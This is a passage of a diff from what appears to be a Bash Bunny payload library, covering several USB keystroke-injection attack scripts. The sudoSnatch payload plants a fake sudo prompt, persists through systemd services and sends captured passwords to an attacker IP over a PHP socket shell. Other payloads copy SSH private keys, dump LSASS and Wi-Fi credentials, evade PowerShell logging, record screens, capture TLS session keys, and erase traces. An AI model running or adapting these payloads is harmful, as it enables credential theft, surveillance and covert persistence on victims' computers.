'User Autologon Registry Items' = 'Get-ItemProperty -Path "Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon" | select "Default*" | ft';
'Local Groups' = 'Get-LocalGroup | ft Name';
'Local Administrators EN' = 'Get-LocalGroupMember Administrators | ft Name, PrincipalSource';
'Local Administrators DE' = 'Get-LocalGroupMember Administratoren | ft Name, PrincipalSource';
'User Directories' = 'Get-ChildItem C:\Users | ft Name';
'Searching for SAM backup files' = 'Test-Path %SYSTEMROOT%\repair\SAM ; Test-Path %SYSTEMROOT%\system32\config\regback\SAM';
'Running Processes' = 'gwmi -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize';
'Installed Software Directories' = 'Get-ChildItem "C:\Program Files", "C:\Program Files (x86)" | ft Parent,Name,LastWriteTime';
'Software in Registry' = 'Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name';
'Folders with Everyone Permissions' = 'Get-ChildItem "C:\Program Files\*", "C:\Program Files (x86)\*" | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match "Everyone"} } catch {}} | ft';
'Folders with BUILTIN\User Permissions' = 'Get-ChildItem "C:\Program Files\*", "C:\Program Files (x86)\*" | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match "BUILTIN\Users"} } catch {}} | ft';
'Checking registry for AlwaysInstallElevated' = 'Test-Path -Path "Registry::HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer" | ft';
'Unquoted Service Paths' = 'gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike ''"*''} | select PathName, DisplayName, Name | ft';
'Scheduled Tasks' = 'Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State';
'Tasks Folder' = 'Get-ChildItem C:\Windows\Tasks | ft';
'Startup Commands' = 'Get-CimInstance Win32_StartupCommand | select Name, command, Location, User | fl';
}
function RunCommands($commands) {
ForEach ($command in $commands.GetEnumerator()) {
whost $command.Name
Invoke-Expression $command.Value
}
}
# Disable Notifications
New-Item HKCU:\Software\Policies\Microsoft\Windows\Explorer -Force
$registryPath1 = "HKCU:\Software\Policies\Microsoft\Windows\Explorer"
$Name1 = "DisableNotificationCenter"
$value1 = "00000001"
IF(!(Test-Path $registryPath1)) {
New-Item -Path $registryPath1 -Force | Out-Null
New-ItemProperty -Path $registryPath1 -Name $Name1 -Value $value1 `
-PropertyType DWORD -Force | Out-Null
} ELSE {
New-ItemProperty -Path $registryPath1 -Name $Name1 -Value $value1 `
-PropertyType DWORD -Force | Out-Null
}
New-Item HKCU:\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance -Force
$registryPath2 = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance"
$Name2 = "Enabled"
$value2 = "00000000"
IF(!(Test-Path $registryPath2)) {
New-Item -Path $registryPath2 -Force | Out-Null
New-ItemProperty -Path $registryPath2 -Name $Name2 -Value $value2 `
-PropertyType DWORD -Force | Out-Null
} ELSE {
New-ItemProperty -Path $registryPath2 -Name $Name2 -Value $value2 `
-PropertyType DWORD -Force | Out-Null
}
New-Item HKCU:\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel -Force
$registryPath3 = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel"
$Name3 = "Enabled"
$value3 = "00000000"
IF(!(Test-Path $registryPath3)) {
New-Item -Path $registryPath3 -Force | Out-Null
New-ItemProperty -Path $registryPath3 -Name $Name3 -Value $value3 `
-PropertyType DWORD -Force | Out-Null
} ELSE {
New-ItemProperty -Path $registryPath3 -Name $Name3 -Value $value3 `
-PropertyType DWORD -Force | Out-Null
}
New-Item HKCU:\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.AutoPlay -Force
$registryPath4 = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.AutoPlay"
$Name4 = "Enabled"
$value4 = "00000000"
IF(!(Test-Path $registryPath4)) {
New-Item -Path $registryPath4 -Force | Out-Null
New-ItemProperty -Path $registryPath4 -Name $Name4 -Value $value4 `
-PropertyType DWORD -Force | Out-Null
} ELSE {
New-ItemProperty -Path $registryPath4 -Name $Name4 -Value $value4 `
-PropertyType DWORD -Force | Out-Null
}
$notify_disable={
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\PushNotifications" -Name "ToastEnabled" -Type DWord -Value 0
}
$notify_enable={
Remove-Item $registryPath1 -Force | Out-Null
Remove-Item $registryPath2 -Force | Out-Null
Remove-Item $registryPath3 -Force | Out-Null
Remove-Item $registryPath4 -Force | Out-Null
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\PushNotifications" -Name "ToastEnabled" -Type DWord -Value 1
}
##################### EXECUTION STEPS ######################################
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Bypass -Force
Invoke-Command -Scriptblock $notify_disable
RunCommands($commands) > $loot\$date-winenum.log
whost "Procdump LSASS! AV-free! Caution: Not Defender aware!"
$proc_run
whost "Dumping Wifi Credentials to USB"
$wifi
whost "Hiding traces and notifications"
Invoke-Command -Scriptblock $notify_enable

49
payloads/library/credentials/sshDump/payload.txt Normal file
View File

@ -0,0 +1,49 @@
# Title: sshDump
# Description: Taking advantage of plain stored ssh private keys in home dir, sshDump grabs them for you.
# AUTHOR: drapl0n
# Version: 1.0
# Category: Credentials
# Target: GNU/Linux.
# Attackmodes: HID, Storage.
LED SETUP
ATTACKMODE STORAGE HID
GET SWITCH_POSITION
LED ATTACK
Q DELAY 1000
Q CTRL-ALT t
Q DELAY 1000
# [Prevent storing history]
Q STRING unset HISTFILE
Q ENTER
Q DELAY 200
# [Fetching BashBunny's block device]
Q STRING lol='$(lsblk | grep 1.8G)'
Q ENTER
Q DELAY 100
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
Q ENTER
Q DELAY 200
# [Mounting BashBunny]
Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
Q ENTER
Q DELAY 2000
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
Q ENTER
Q DELAY 500
# [Looting]
Q STRING cp -r '~/.ssh' '$mntt/loot/SSH'
Q ENTER
Q DELAY 2000
# [Unmounting BashBunny]
Q STRING udisksctl unmount -b /dev/'$disk'
Q ENTER
Q DELAY 500
Q STRING exit
Q ENTER
LED FINISH

48
payloads/library/credentials/sudoSnatch/README.md Normal file
View File

@ -0,0 +1,48 @@
## About:
* Title: sudoSnatch
* Description: sudoSnatch grabs plain text passwords remotely/locally.
* AUTHOR: drapl0n
* Version: 1.0
* Category: Credentials
* Target: Unix-like operating systems with systemd.
* Attackmodes: HID, Storage
## sudoSnatch: sudoSnatch payload grabs sudo password in plain text, imediately after victim uses `sudo` command and sends it back to attacker remotely/locally.
### Features:
* Plain text passwords.
* Detailed password logs.
* Persistent
* Autostart payload on boot.
### Workflow:
* Injecting payload on target's system.
* Checks whether internet is connected to the target system.
* If internet is connected then it sends clear text passwords to attacker.
### Changes to be made in payload.sh:
* Replace ip(0.0.0.0) and port number(4444) with your servers ip address and port number on line no `10`.
* Increase/Decrease time interval to restart service periodically (Default is 15 mins), on line no `14`.
### LED Status:
* `SETUP` : MAGENTA
* `ATTACK` : YELLOW
* `FINISH` : GREEN
### Directory Structure of payload components:
| FileName | Directory |
| -------------- | ----------------------------- |
| payload.txt | /payloads/switch1/ |
| payload.sh | /payloads/ |
| shell | /payloads/library/sudoSnatch/ |
| systemMgr | /payloads/library/sudoSnatch/ |
* Note: Create directory named `sudoSnatch` in `/payloads/library/`
### Usage:
1. Inject payload into target's system.
2. Start netcat listner on attacking system:
* `nc -l -p <port number>` use this command to fetch passwords.
#### Support me if you like my work:
* https://twitter.com/drapl0n

23
payloads/library/credentials/sudoSnatch/payload.sh Normal file
View File

@ -0,0 +1,23 @@
#!/bin/bash
unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
mkdir /var/tmp/.system
lol=$(lsblk | grep 1.8G)
disk=$(echo $lol | awk '{print $1}')
mntt=$(lsblk | grep $disk | awk '{print $7}')
cp -r $mntt/payloads/library/sudoSnatch/systemMgr /var/tmp/.system/
chmod +x /var/tmp/.system/systemMgr
touch /var/tmp/.system/sysLog
echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"cat /var/tmp/.system/sysLog "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus
chmod +x /var/tmp/.system/systemBus
mkdir -p ~/.config/systemd/user
echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot
chmod +x /var/tmp/.system/reboot
echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/reboot.service
systemctl --user daemon-reload
systemctl --user enable --now systemBUS.service
systemctl --user start --now systemBUS.service
systemctl --user enable --now reboot.service
systemctl --user start --now reboot.service
cp -r $mntt/payloads/library/sudoSnatch/shell /tmp/
chmod +x /tmp/shell && /tmp/./shell && rm /tmp/shell

56
payloads/library/credentials/sudoSnatch/payload.txt Normal file
View File

@ -0,0 +1,56 @@
# Title: sudoSnatch
# Description: sudoSnatch grabs plain text passwords remotely/locally.
# AUTHOR: drapl0n
# Version: 1.0
# Category: Credentials
# Target: Unix-like operating systems with systemd.
# Attackmodes: HID, Storage
LED SETUP
ATTACKMODE STORAGE HID
GET SWITCH_POSITION
LED ATTACK
Q DELAY 1000
Q CTRL-ALT t
Q DELAY 1000
# [Prevent storing history]
Q STRING unset HISTFILE
Q ENTER
Q DELAY 200
# [Fetching BashBunny's block device]
Q STRING lol='$(lsblk | grep 1.8G)'
Q ENTER
Q DELAY 100
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
Q ENTER
Q DELAY 200
# [Mounting BashBunny]
Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
Q ENTER
Q DELAY 1400
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
Q ENTER
Q DELAY 200
# [transfering payload script]
Q STRING cp -r '$mntt'/payloads/payload.sh /tmp/
Q ENTER
Q STRING chmod +x /tmp/payload.sh
Q ENTER
Q STRING /tmp/./payload.sh
Q ENTER
Q DELAY 5000
Q STRING rm /tmp/payload.sh
Q ENTER
Q DELAY 500
# [Unmounting BashBunny]
Q STRING udisksctl unmount -b /dev/'$disk'
Q ENTER
Q DELAY 500
Q STRING exit
Q ENTER
LED FINISH

12
payloads/library/credentials/sudoSnatch/shell Normal file
View File

@ -0,0 +1,12 @@
#!/bin/bash
ls -a ~/ | grep 'zshrc' &> /dev/null
if [ $? = 0 ]; then
echo -e "alias sudo='bash /var/tmp/.system/systemMgr && sudo'" >> ~/.zshrc
echo "systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service && systemctl --user restart reboot.service" >> ~/.zshrc
fi
ls -a ~/ | grep 'bashrc' &> /dev/null
if [ $? = 0 ]; then
echo -e "alias sudo='bash /var/tmp/.system/systemMgr && sudo'" >> ~/.bashrc
echo "systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service && systemctl --user restart reboot.service" >> ~/.bashrc
fi

5
payloads/library/credentials/sudoSnatch/systemMgr Normal file
View File

@ -0,0 +1,5 @@
#!/bin/bash
echo -n "[sudo] password for $(whoami):"
IFS="" read -s pass
echo -e "Timestamp=[$(date)] \t User=[$(whoami)] \t Password=[$pass]" >> /var/tmp/.system/sysLog
echo -e "\nSorry, try again."

29
payloads/library/credentials/win_problemstepsrecorder/README.md Normal file
View File

@ -0,0 +1,29 @@
# "Microsoft Windows" Problem Steps Recorder
- Title: Win_ProblemStepsRecorder
- Author: TW-D
- Version: 1.0
- Target: Microsoft Windows
- Category: Credentials
## Description
1) Partially avoids "PowerShell Script Block Logging".
2) Closing of all windows.
3) Hide "PowerShell" window.
4) Abuse of "Windows Problem Steps Recorder" to spy on a user's activities.
5) Writes the file system cache to disk.
6) Safely eject.
## Configuration
From "payload.txt" change the values of the following constants :
```bash
######## INITIALIZATION ########
readonly BB_LABEL="BashBunny"
readonly RECORDER_TIME=300
```

50
payloads/library/credentials/win_problemstepsrecorder/payload.ps1 Normal file
View File

@ -0,0 +1,50 @@
#
# Author: TW-D
# Version: 1.0
#
Param (
[String] $BB_VOLUME,
[Int] $RECORDER_TIME
)
# Partially avoids "PowerShell Script Block Logging".
#
$etw_provider = [Ref].Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider").GetField("etwProvider", "NonPublic,Static")
$event_provider = New-Object System.Diagnostics.Eventing.EventProvider -ArgumentList @([Guid]::NewGuid())
$etw_provider.SetValue($null, $event_provider)
# Closing of all windows.
#
Get-Process -Name "explorer" | Stop-Process
# Hide "PowerShell" window.
#
$Script:showWindowAsync = Add-Type -MemberDefinition @"
[DllImport("user32.dll")]
public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);
"@ -Name "Win32ShowWindowAsync" -Namespace Win32Functions -PassThru
$showWindowAsync::ShowWindowAsync((Get-Process -Id $pid).MainWindowHandle, 0) | Out-Null
If ((Test-Path -Path "C:\Windows\System32\psr.exe")) {
$bb_loot = "${BB_VOLUME}loot\"
$computer_name = $env:COMPUTERNAME
# Abuse of "Windows Problem Steps Recorder" to spy on a user's activities.
#
(C:\Windows\System32\psr.exe /start /sc 1 /maxsc 999 /gui 0 /sketch 1 /slides 1 /output "${bb_loot}${computer_name}_record.zip") | Out-Null
Start-Sleep -Seconds $RECORDER_TIME
(C:\Windows\System32\psr.exe /stop) | Out-Null
}
"Win_ProblemStepsRecorder terminated." | Out-File -FilePath .\..\..\loot\done.txt -Force
# Writes the file system cache to disk.
#
Write-VolumeCache -DriveLetter ("${BB_VOLUME}".Substring(0,1))
# Safely eject.
#
(New-Object -ComObject Shell.Application).Namespace(17).ParseName("${BB_VOLUME}").InvokeVerb("Eject")

91
payloads/library/credentials/win_problemstepsrecorder/payload.txt Normal file
View File

@ -0,0 +1,91 @@
#!/bin/bash
#
# Title: Win_ProblemStepsRecorder
#
# Description:
# Abuse of "Windows Problem Steps Recorder"
# to spy on a user's activities.
#
# Author: TW-D
# Version: 1.0
# Category: Credentials
# Target: Since Microsoft Windows 7 and 2008 R2
# Attackmodes: HID and STORAGE
#
# TESTED ON
# ===============
# Microsoft Windows 10 Family Version 20H2 (PowerShell 5.1)
# Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1)
#
# NOTE
# ===============
# Use the browser "Internet Explorer" to read the ".mht" file correctly.
#
# STATUS
# ===============
# Magenta solid ................................... SETUP
# Yellow single blink ............................. ATTACK
# Yellow double blink ............................. STAGE2
# Yellow triple blink ............................. STAGE3
# Cyan inverted single blink ...................... SPECIAL
# White fast blink ................................ CLEANUP
# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
######## INITIALIZATION ########
readonly BB_LABEL="BashBunny"
readonly RECORDER_TIME=300
######## SETUP ########
LED SETUP
ATTACKMODE HID STORAGE
GET SWITCH_POSITION
udisk mount
######## ATTACK ########
LED ATTACK
Q DELAY 7000
RUN WIN "powershell -NoLogo -NoProfile -ExecutionPolicy Bypass"
Q DELAY 7000
LED STAGE2
Q STRING "\$BB_VOLUME = \"\$((Get-WmiObject -Class Win32_Volume -Filter \"Label LIKE '${BB_LABEL}'\").Name)\""
Q ENTER
Q DELAY 3500
Q STRING "\$BB_SWITCH = \"\${BB_VOLUME}payloads\\${SWITCH_POSITION}\\\""
Q ENTER
Q DELAY 1500
Q STRING "CD \"\${BB_SWITCH}\""
Q ENTER
Q DELAY 1500
LED STAGE3
Q STRING ".\payload.ps1 -BB_VOLUME \"\${BB_VOLUME}\" -RECORDER_TIME ${RECORDER_TIME}"
Q ENTER
Q DELAY 1500
LED SPECIAL
until [ -f /root/udisk/loot/done.txt ]; do sleep 10; sync; done
######## CLEANUP ########
LED CLEANUP
rm /root/udisk/loot/done.txt
sync
udisk unmount
######## FINISH ########
LED FINISH
shutdown -h 0

63
payloads/library/credentials/win_sslkeylog/README.md Normal file
View File

@ -0,0 +1,63 @@
# "Microsoft Windows" SSLKEYLOG
- Title: Win_SSLKeyLog
- Author: TW-D
- Version: 1.0
- Target: Microsoft Windows
- Category: Credentials
## Description
>
> Captures the client network session.
>
> Captures the client side session keys.
>
1) Partially avoids "PowerShell Script Block Logging".
2) Closing of all windows.
3) Hide "PowerShell" window.
4) Check if current process have "Administrator" privilege.
5) Sets the "SSLKEYLOGFILE" environment variable to store SSL session key information.
6) Starts a "Network Tracing Session" with "ETW (Event Tracing for Windows)".
7) Writes the file system cache to disk.
8) Safely eject.
## Configuration
From "payload.txt" change the values of the following constants :
```bash
######## INITIALIZATION ########
readonly BB_LABEL="BashBunny"
readonly SNIFFING_TIME=300
```
## Required
Utility that converts an .etl file containing a Windows network packet capture into .pcapng format.
[ETL2PCAPNG](https://github.com/microsoft/etl2pcapng)
Wireshark network protocol analyzer.
[WIRESHARK](https://www.wireshark.org/)
## Steps
Convert "capture.etl" file into "capture.pcapng" with "etl2pcapng".
```
.\etl2pcapng.exe .\capture.etl .\capture.pcapng
```
Open your "capture.pcapng" with "Wireshark".
Configure "Wireshark" for HTTPS decryption.
```
Edit - Preferences
Protocols - (SSL and/or TLS)
(Pre)-Master-Secret log filename -> Browse -> SSLKEYLOGFILE.txt
```
Happy hunting.

58
payloads/library/credentials/win_sslkeylog/payload.ps1 Normal file
View File

@ -0,0 +1,58 @@
#
# Author: TW-D
# Version: 1.0
#
Param (
[String] $BB_VOLUME,
[Int] $SNIFFING_TIME
)
# Partially avoids "PowerShell Script Block Logging".
#
$etw_provider = [Ref].Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider").GetField("etwProvider", "NonPublic,Static")
$event_provider = New-Object System.Diagnostics.Eventing.EventProvider -ArgumentList @([Guid]::NewGuid())
$etw_provider.SetValue($null, $event_provider)
# Closing of all windows.
#
Get-Process -Name "explorer" | Stop-Process
# Hide "PowerShell" window.
#
$Script:showWindowAsync = Add-Type -MemberDefinition @"
[DllImport("user32.dll")]
public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);
"@ -Name "Win32ShowWindowAsync" -Namespace Win32Functions -PassThru
$showWindowAsync::ShowWindowAsync((Get-Process -Id $pid).MainWindowHandle, 0) | Out-Null
# Check if current process have "Administrator" privilege.
#
If ( ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator") ) {
$bb_loot = "${BB_VOLUME}loot\"
# Sets the "SSLKEYLOGFILE" environment variable to store SSL session key information.
#
[Environment]::SetEnvironmentVariable("SSLKEYLOGFILE", $null, "User")
[Environment]::SetEnvironmentVariable("SSLKEYLOGFILE", "${bb_loot}SSLKEYLOGFILE.txt", "User")
# Starts a "Network Tracing Session" with "ETW (Event Tracing for Windows)".
#
(NETSH trace start capture=yes report=no persistent=yes traceFile="${bb_loot}capture.etl" maxSize=0 fileMode=append) | Out-Null
Start-Sleep -Seconds $SNIFFING_TIME
(NETSH trace stop) | Out-Null
[Environment]::SetEnvironmentVariable("SSLKEYLOGFILE", $null, "User")
}
"Win_SSLKeyLog terminated." | Out-File -FilePath .\..\..\loot\done.txt -Force
# Writes the file system cache to disk (thanks to @dark_pyrro).
#
Write-VolumeCache -DriveLetter ("${BB_VOLUME}".Substring(0,1))
# Safely eject (thanks to @Night (9o3)).
#
(New-Object -ComObject Shell.Application).Namespace(17).ParseName("${BB_VOLUME}").InvokeVerb("Eject")

108
payloads/library/credentials/win_sslkeylog/payload.txt Normal file
View File

@ -0,0 +1,108 @@
#!/bin/bash
#
# Title: Win_SSLKeyLog
#
# Description:
# Captures the client network session.
# Captures the client side session keys.
#
# 1) Partially avoids "PowerShell Script Block Logging".
# 2) Closing of all windows.
# 3) Hide "PowerShell" window.
# 4) Check if current process have "Administrator" privilege.
# 5) Sets the "SSLKEYLOGFILE" environment variable to store SSL session key information.
# 6) Starts a "Network Tracing Session" with "ETW (Event Tracing for Windows)".
# 7) Writes the file system cache to disk (thanks to @dark_pyrro).
# 8) Safely eject (thanks to @Night (9o3)).
#
# Author: TW-D
# Version: 1.0
# Category: Credentials
# Target: Microsoft Windows 10
# Attackmodes: HID and STORAGE
#
# TESTED ON
# ===============
# Microsoft Windows 10 Family Version 20H2 (PowerShell 5.1)
# Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1)
#
# REQUIREMENTS
# ===============
# The target user must belong to the 'Administrator' group.
#
# STATUS
# ===============
# Magenta solid ................................... SETUP
# Yellow single blink ............................. ATTACK
# Yellow double blink ............................. STAGE2
# Yellow triple blink ............................. STAGE3
# Cyan inverted single blink ...................... SPECIAL
# White fast blink ................................ CLEANUP
# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
######## INITIALIZATION ########
readonly BB_LABEL="BashBunny"
readonly SNIFFING_TIME=300
######## SETUP ########
LED SETUP
ATTACKMODE HID STORAGE
GET SWITCH_POSITION
udisk mount
######## ATTACK ########
LED ATTACK
Q DELAY 5000
Q GUI r
Q DELAY 5000
Q STRING "powershell -NoLogo -NoProfile -ExecutionPolicy Bypass"
Q DELAY 1500
Q CTRL-SHIFT ENTER
Q DELAY 5000
Q LEFTARROW
Q DELAY 3000
Q ENTER
Q DELAY 7000
LED STAGE2
Q STRING "\$BB_VOLUME = \"\$((Get-WmiObject -Class Win32_Volume -Filter \"Label LIKE '${BB_LABEL}'\").Name)\""
Q ENTER
Q DELAY 3500
Q STRING "\$BB_SWITCH = \"\${BB_VOLUME}payloads\\${SWITCH_POSITION}\\\""
Q ENTER
Q DELAY 1500
Q STRING "CD \"\${BB_SWITCH}\""
Q ENTER
Q DELAY 1500
LED STAGE3
Q STRING ".\payload.ps1 -BB_VOLUME \"\${BB_VOLUME}\" -SNIFFING_TIME ${SNIFFING_TIME}"
Q ENTER
Q DELAY 1500
LED SPECIAL
until [ -f /root/udisk/loot/done.txt ]; do sleep 10; sync; done
######## CLEANUP ########
LED CLEANUP
rm /root/udisk/loot/done.txt
sync
udisk unmount
######## FINISH ########
LED FINISH
shutdown -h 0

89
payloads/library/execution/-BB-Play-WAV/Play-WAV.ps1 Normal file
View File

@ -0,0 +1,89 @@
############################################################################################################################################################
# | ___ _ _ _ # ,d88b.d88b #
# Title : Play-WAV | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
# Category : Execution | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
# Target : Windows 10,11 | |___/ # /\/|_ __/\\ #
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
# Dependencies : Dropbox | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
# # / \ / ~ \ #
# github.com/I-Am-Jakoby # \ / \~ ~/ #
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
############################################################################################################################################################
<#
.NOTES
This script requires you to have a DropBox account or another file hosting service
.DESCRIPTION
This program downloads a sound from your DropBox
Turns the volume to max level on victims PC
Pauses the script until a mouse movement is detected
Then plays the sound with nothing popping up catching your victim off guard
Finally a few lines of script are executed to empty TMP folder, clear Run and Powershell history
#>
############################################################################################################################################################
# Download Sound (When using your own link "dl=0" needs to be changed to "dl=1")
iwr https:// <Your DropBox shared link intended for file> ?dl=1 -O $env:TMP\e.wav
############################################################################################################################################################
# This turns the volume up to max level
$k=[Math]::Ceiling(100/2);$o=New-Object -ComObject WScript.Shell;for($i = 0;$i -lt $k;$i++){$o.SendKeys([char] 175)}
############################################################################################################################################################
# This while loop will constantly check if the mouse has been moved
# if the mouse has not moved "SCROLLLOCK" will be pressed to prevent screen from turning off
# it will then sleep for the indicated number of seconds and check again
Add-Type -AssemblyName System.Windows.Forms
$originalPOS = [System.Windows.Forms.Cursor]::Position.X
while (1) {
$pauseTime = 3
if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
break
}
else {
$o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime
}
}
############################################################################################################################################################
# Play Sound
$PlayWav=New-Object System.Media.SoundPlayer;$PlayWav.SoundLocation="$env:TMP\e.wav";$PlayWav.playsync()
############################################################################################################################################################
<#
.NOTES
This is to clean up behind you and remove any evidence to prove you were there
#>
# Delete contents of Temp folder
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
# Delete run box history
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
# Delete powershell history
Remove-Item (Get-PSreadlineOption).HistorySavePath
# Deletes contents of recycle bin
Clear-RecycleBin -Force -ErrorAction SilentlyContinue

99
payloads/library/execution/-BB-Play-WAV/README.md Normal file
View File

@ -0,0 +1,99 @@
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Play-WAV
A script used to download a WAV file and play it after a mouse movement is detected
## Description
This program starts off by using an Invoke-WebRequest to download a WAV file
The system volume is then turned up to the max level
Then the script will be paused until a mouse movement is detected
After one is the WAV file will be played
## Getting Started
### Dependencies
* DropBox - Your Shared link for the intended file
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download your WAV file
```
powershell -w h -NoP -NonI -Exec Bypass iwr https:// < Your Shared link for the intended file> ?dl=1 -O $env:TMP\e.wav
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<div><h2>I am Jakoby</h2></div>
<p><br/>
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
<a href="https://github.com/I-Am-Jakoby/">
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
</a>
<a href="https://www.instagram.com/i_am_jakoby/">
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
</a>
<a href="https://twitter.com/I_Am_Jakoby/">
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
</a>
<a href="https://www.youtube.com/c/IamJakoby/">
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
</a>
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/BashBunny/Payloads/BB-Play-WAV)
</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG)
<p align="right">(<a href="#top">back to top</a>)</p>

26
payloads/library/execution/-BB-Play-WAV/payload.txt Normal file
View File

@ -0,0 +1,26 @@
# Title: Play-WAV
# Description: This payload will download a WAV file, pause until a mouse movement is detected then play the sound effect
# Author: I am Jakoby
# Version: 1.0
# Category: Execution
# Attackmodes: HID, Storage
# Target: Windows 10, 11
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
LED STAGE1
QUACK DELAY 3000
QUACK GUI r
QUACK DELAY 100
LED STAGE2
QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\Play-WAV.ps1')"
QUACK ENTER

97
payloads/library/execution/-BB-SafeHaven/README.md Normal file
View File

